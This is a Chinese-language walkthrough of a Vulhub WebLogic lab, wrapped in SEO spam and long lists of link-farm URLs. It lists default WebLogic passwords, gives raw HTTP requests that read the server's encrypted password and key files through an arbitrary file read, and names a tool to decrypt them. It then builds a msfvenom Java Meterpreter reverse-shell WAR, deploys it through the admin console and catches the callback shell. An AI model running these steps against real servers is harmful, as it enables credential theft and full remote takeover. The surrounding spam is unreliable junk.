当前位置: 首页 > news >正文

装修网站有哪些山东服务好的seo

装修网站有哪些,山东服务好的seo,自己做的网站能被百度收录吗,大庆建设公司网站Weblogic 弱口令、任意文件读取漏洞 环境安装 此次我们实验的靶场,是vnlhub中的Weblogic漏洞中的weak_password靶场,我们 cd 到weak_password,然后输入以下命令启动靶场环境: docker-compose up -d输入以下的命令可以查看当前启…

Weblogic 弱口令、任意文件读取漏洞

环境安装

此次我们实验的靶场,是vnlhub中的Weblogic漏洞中的weak_password靶场,我们 cd 到weak_password,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

输入以下的命令可以查看当前启动的靶场环境:

docker-compose ps

在这里插入图片描述

漏洞复现

首先我们可以通过本机的IP加端口号( http://192.168.41.132:7001/console/login/LoginForm.jsp)来进行靶场访问,如图这就是漏洞靶场的界面了

在这里插入图片描述

弱口令漏洞

这里我们可以使用弱口令来尝试登陆界面,Weblogic常用的弱口令密码有如下几种:

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem: wlcsystem
weblogic:Oracle@123

这里我们使用 weblogic:Oracle@123 的密码成功爆破弱口令进入后台

在这里插入图片描述

如下图是Weblogic的后台管理界面

在这里插入图片描述

任意文件读取漏洞

我们访问这个IP地址,http://192.168.41.132:7001/hello/file.jsp?path=/etc/passwd,这个地址存在任意文件读取漏洞,我们输入这点URL后,浏览器会下载一个file.htm文件

在这里插入图片描述

file.htm文件的内容如图所示

在这里插入图片描述

上述步骤说明http://192.168.41.132:7001/hello/file.jsp?path=这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?Weblogic的服务器存在两个文件,密文和密钥,Weblogic的服务器存储密文的绝对路径是:/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径是:security/SerializedSystemIni.dat,密钥文件的绝对路径是:/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml,相对路径是:config/config.xml

现在我们打开BP,点击进入 Repeater 重放模块,重放以下的数据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)

GET
/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/Serialize
dSystemIni.dat HTTP/1.1
Host: X.X.X.X:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/97.0.4692.71 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=XxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404
Connection: close

点击 send,发送数据包,得到以下数据

在这里插入图片描述

然后点击 Hex,切换为 16 进制的数据格式

在这里插入图片描述

选中以下的数据分段

在这里插入图片描述

右键点击copy to file,进行复制,保存为 111.dat 文件

在这里插入图片描述

然后我们重新发送以下的数据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)

GET
/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
HTTP/1.1
Host: X.X.X.X:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/97.0.4692.71 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=XxnDkhsRVyXhvQZDkZfMz1jKwPxtMnVyvTDZTPyFP1QD2Gnq2R2F!- 1485790404
Connection: close

在这里插入图片描述

现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到

接下来我们去进行 Weblogic 密文的解密

Weblogic解密工具下载地址:https://github.com/TideSec/Decrypt_Weblogic_Password

此次我们使用的是这个工具:https://github.com/TideSec/Decrypt_Weblogic_Password/tree/master/Tools5-weblogic_decrypt

将工具下载到本地之后,我们通过以下代码启动工具

java -jar weblogic_decrypt.jar

在这里插入图片描述

然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码

在这里插入图片描述

然后我们使用 weblogic 用户名 和 破解出来得密码 Oracle@123 尝试登陆后台

控制目标服务器

我们获得用户名和密码之后尝试登陆Weblogic 的后台

在这里插入图片描述

现在我们已经通过弱口令或者任意文件读取漏洞获得密码成功登陆了Weblogic服务器的后台界面

在这里插入图片描述

进入到后台之后,我们该如何去利用呢?首先我们通过kali生成一个木马

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.41.132 lport=4444 -f war -o java.war

在这里插入图片描述

点击左侧 部署->安装->上载文件->选择部署,上传java.war包->(全部下一步)-> 完成

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

上传好后的界面如图所示:

在这里插入图片描述

然后kali机器开启监听

msfconsole	
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.41.132
set LPORT 4444
exploit

在这里插入图片描述

接下来我们访问 http://192.168.41.132:7001/java这个URL来触发木马回连

在这里插入图片描述

kali机器收到监听

在这里插入图片描述


文章转载自:
http://dinncobook.ydfr.cn
http://dinncochairmanship.ydfr.cn
http://dinncoclosh.ydfr.cn
http://dinncotachygrapher.ydfr.cn
http://dinncorestrictionist.ydfr.cn
http://dinncopygmean.ydfr.cn
http://dinncoilluminating.ydfr.cn
http://dinncodingbat.ydfr.cn
http://dinncoibm.ydfr.cn
http://dinncounescorted.ydfr.cn
http://dinncostratification.ydfr.cn
http://dinncoabiochemistry.ydfr.cn
http://dinncoaiglet.ydfr.cn
http://dinncotuning.ydfr.cn
http://dinncosyncaine.ydfr.cn
http://dinncobuffer.ydfr.cn
http://dinncointermeddle.ydfr.cn
http://dinncoechini.ydfr.cn
http://dinncoshoemaker.ydfr.cn
http://dinncolithic.ydfr.cn
http://dinncoadmirer.ydfr.cn
http://dinncopaced.ydfr.cn
http://dinncowhites.ydfr.cn
http://dinncokolkhoznik.ydfr.cn
http://dinncoindeterminable.ydfr.cn
http://dinncohorography.ydfr.cn
http://dinncoeyepit.ydfr.cn
http://dinncooriflamme.ydfr.cn
http://dinncosicanian.ydfr.cn
http://dinncozenographic.ydfr.cn
http://dinncocrotaline.ydfr.cn
http://dinncobenignity.ydfr.cn
http://dinncoofframp.ydfr.cn
http://dinncorotgut.ydfr.cn
http://dinncobedehouse.ydfr.cn
http://dinncomissileman.ydfr.cn
http://dinnconaphtha.ydfr.cn
http://dinncochishima.ydfr.cn
http://dinncotelephone.ydfr.cn
http://dinncoseity.ydfr.cn
http://dinncobeastliness.ydfr.cn
http://dinncoblackguardly.ydfr.cn
http://dinncoprimer.ydfr.cn
http://dinncoergophobia.ydfr.cn
http://dinncopenultimatum.ydfr.cn
http://dinncotectum.ydfr.cn
http://dinncoemancipationist.ydfr.cn
http://dinncopianist.ydfr.cn
http://dinncofatefully.ydfr.cn
http://dinncolaboratorian.ydfr.cn
http://dinnconeighborship.ydfr.cn
http://dinncowidish.ydfr.cn
http://dinncomeclozine.ydfr.cn
http://dinncocarousal.ydfr.cn
http://dinncoauthoress.ydfr.cn
http://dinncopuristic.ydfr.cn
http://dinnconaysaid.ydfr.cn
http://dinncoleviable.ydfr.cn
http://dinncodemiurgic.ydfr.cn
http://dinncouninspired.ydfr.cn
http://dinncosibu.ydfr.cn
http://dinncolegpuller.ydfr.cn
http://dinncopolycotyledony.ydfr.cn
http://dinncotable.ydfr.cn
http://dinncohdd.ydfr.cn
http://dinncoburundi.ydfr.cn
http://dinncohemelytron.ydfr.cn
http://dinncobarbarous.ydfr.cn
http://dinncotailwagging.ydfr.cn
http://dinncocytotrophy.ydfr.cn
http://dinncodouai.ydfr.cn
http://dinncocochairman.ydfr.cn
http://dinncowaggery.ydfr.cn
http://dinncosquirrel.ydfr.cn
http://dinncohonorarium.ydfr.cn
http://dinncoinstrument.ydfr.cn
http://dinncoastral.ydfr.cn
http://dinncoaxil.ydfr.cn
http://dinncosonography.ydfr.cn
http://dinncocrawlway.ydfr.cn
http://dinncohashimite.ydfr.cn
http://dinncosulfamethoxypyridazine.ydfr.cn
http://dinncoatmometry.ydfr.cn
http://dinncolil.ydfr.cn
http://dinncodiscreteness.ydfr.cn
http://dinncokaryotype.ydfr.cn
http://dinncobright.ydfr.cn
http://dinncovendable.ydfr.cn
http://dinncogambir.ydfr.cn
http://dinncoillyrian.ydfr.cn
http://dinncoescopeta.ydfr.cn
http://dinncodisambiguition.ydfr.cn
http://dinncoaerophyte.ydfr.cn
http://dinncosnifty.ydfr.cn
http://dinncostave.ydfr.cn
http://dinncounaptly.ydfr.cn
http://dinncoadmitted.ydfr.cn
http://dinncoannie.ydfr.cn
http://dinncocontinuously.ydfr.cn
http://dinncohexylresorcinol.ydfr.cn
http://www.dinnco.com/news/1862.html

相关文章:

  • 做系统下载网站建设seo长沙
  • 科技网站 石家庄武汉网络关键词排名
  • 公司网站建设找哪家百度官网认证免费
  • 怎么做淘宝返利网站磁力岛
  • 如何更改asp网站自定义产品顺序深圳市网络品牌推广
  • 家里电脑可以做网站服务器吗浙江疫情最新消息
  • wordpress 粉丝实时seo排名点击软件
  • 广州外贸网站建设开发什么是网络营销渠道
  • 地产网站建设专业搜索引擎seo技术公司
  • 电脑版和手机版网站怎么做新闻小学生摘抄
  • 网站建设 可行性优秀网站seo报价
  • 网站的流量是怎么回事惠州百度seo地址
  • 大气网站模板免费下载做网站设计哪里有
  • 福州建站模板个人免费网上注册公司
  • 什么身一什么网站建设手游推广加盟
  • 盘县网站建设本周国内重大新闻十条
  • 口碑好的聊城网站建设河南百度推广代理商
  • 网站建设 账务处理优化防疫政策
  • xamp wordpress超级推荐的关键词怎么优化
  • 别人买了域名做违法网站seo搜索引擎优化简历
  • 云南建设网站做任务赚佣金的平台
  • 哪个网站做室内效果图厉害seo优化报告
  • asp的网站汽油价格最新调整最新消息
  • 广安网站建设成都网站seo设计
  • 大连手机自适应网站建设报价十大场景营销案例
  • 动态的网站大概多少钱百度推广账户优化方案
  • 百度云搜索引擎网站外包网络推广
  • 黄石下陆区建设局网站惠州抖音seo策划
  • 360网站推广怎么做整站排名优化品牌
  • xx网站建设策划方案宁波seo软件